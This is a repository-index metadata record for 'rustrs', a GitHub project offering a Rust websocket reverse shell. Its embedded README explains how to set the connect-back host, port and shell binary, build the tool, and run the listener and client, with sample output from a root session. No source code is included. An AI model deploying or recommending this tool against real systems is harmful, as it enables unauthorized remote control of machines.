{"id":19552945,"url":"https://github.com/potato-industries/rustrs","last_synced_at":"2025-04-26T20:31:53.187Z","repository":{"id":177275629,"uuid":"224509934","full_name":"Potato-Industries/rustrs","owner":"Potato-Industries","description":"portable rust based websocket reverse shell","archived":false,"fork":false,"pushed_at":"2019-11-27T21:05:50.000Z","size":7,"stargazers_count":7,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-04T17:51:50.697Z","etag":null,"topics":["reverse-shell","rust","websocket"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Potato-Industries.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-11-27T20:15:14.000Z","updated_at":"2022-03-10T23:09:58.000Z","dependencies_parsed_at":"2023-07-20T03:15:34.502Z","dependency_job_id":null,"html_url":"https://github.com/Potato-Industries/rustrs","commit_stats":null,"previous_names":["potato-industries/rustrs"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Frustrs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Frustrs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Frustrs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Potato-Industries%2Frustrs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Potato-Industries","download_url":"https://codeload.github.com/Potato-Industries/rustrs/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251051459,"owners_count":21528787,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["reverse-shell","rust","websocket"],"created_at":"2024-11-11T04:20:15.313Z","updated_at":"2025-04-26T20:31:53.181Z","avatar_url":"https://github.com/Potato-Industries.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"# rustrs\n\nportable rust based websocket reverse shell\n\n**Compile**\n\n- Update script: ip/domain, port, binary (cmd.exe, /bin/bash, etc)\n\n```\nroot@kali:/opt/rustrs# cargo build\n    Finished dev [unoptimized + debuginfo] target(s) in 0.02s\n```\n\nBuild for target platform. \n- https://forge.rust-lang.org/release/platform-support.html\n\n**Usage**\n\nWebSocket Listener\n\n```\nroot@kali:/opt/rustrs/target/debug# ./server \nwaiting for new reverse websocket session..\nnew session started, connected.\n$ id\nuid=0(root) gid=0(root) groups=0(root)\n\n$ netstat -pantwu\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    \ntcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      1/init              \ntcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      28346/./server      \n\n```\n\nWebSocket Client (reverse shell)\n\n```\nroot@kali:/opt/rustrs/target/debug# ./client \n\n```\n\nEnjoy~\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpotato-industries%2Frustrs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpotato-industries%2Frustrs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpotato-industries%2Frustrs/lists"}